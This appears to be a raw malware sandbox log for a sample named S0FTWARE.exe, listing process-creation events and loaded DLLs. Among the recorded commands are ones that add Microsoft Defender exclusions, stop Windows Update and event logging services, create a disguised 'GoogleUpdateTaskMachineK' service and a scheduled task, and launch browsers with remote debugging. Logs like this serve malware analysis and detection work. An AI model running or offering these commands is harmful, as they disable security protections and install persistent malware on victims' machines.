                        Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2732 --field-trial-handle=2600,i,17974872305379590479,9492562084942244494,262144 /prefetch:3
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2728 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:3
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6720 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:8
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6920 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:8
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s lfsvc
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\ProgramData\AAFIJKKEHJ.exe "C:\ProgramData\AAFIJKKEHJ.exe"
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\ProgramData\GoogleUP\Chrome\Updater.exe C:\ProgramData\GoogleUP\Chrome\Updater.exe
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\ProgramData\GHDAKKJJJK.exe "C:\ProgramData\GHDAKKJJJK.exe"
                        Source: C:\ProgramData\GHDAKKJJJK.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\service.exe C:\Users\user\AppData\Roaming\service.exe
                        Source: C:\Users\user\AppData\Roaming\service.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCGHJEBGHJKE" & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                        Source: C:\Users\user\Desktop\S0FTWARE.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\ProgramData\AAFIJKKEHJ.exe "C:\ProgramData\AAFIJKKEHJ.exe" Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\ProgramData\GHDAKKJJJK.exe "C:\ProgramData\GHDAKKJJJK.exe" Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCGHJEBGHJKE" & exitJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2324,i,17997273353640924679,7727149592954305312,262144 /prefetch:8Jump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2732 --field-trial-handle=2600,i,17974872305379590479,9492562084942244494,262144 /prefetch:3Jump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2728 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:3Jump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6720 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:8Jump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6920 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:8Jump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\ProgramData\AAFIJKKEHJ.exe "C:\ProgramData\AAFIJKKEHJ.exe" Jump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /fJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\ProgramData\GHDAKKJJJK.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Users\user\AppData\Roaming\service.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                        Source: C:\Users\user\Desktop\S0FTWARE.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\S0FTWARE.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\S0FTWARE.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Users\user\Desktop\S0FTWARE.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mozglue.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wsock32.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sfc_os.dllJump to behavior
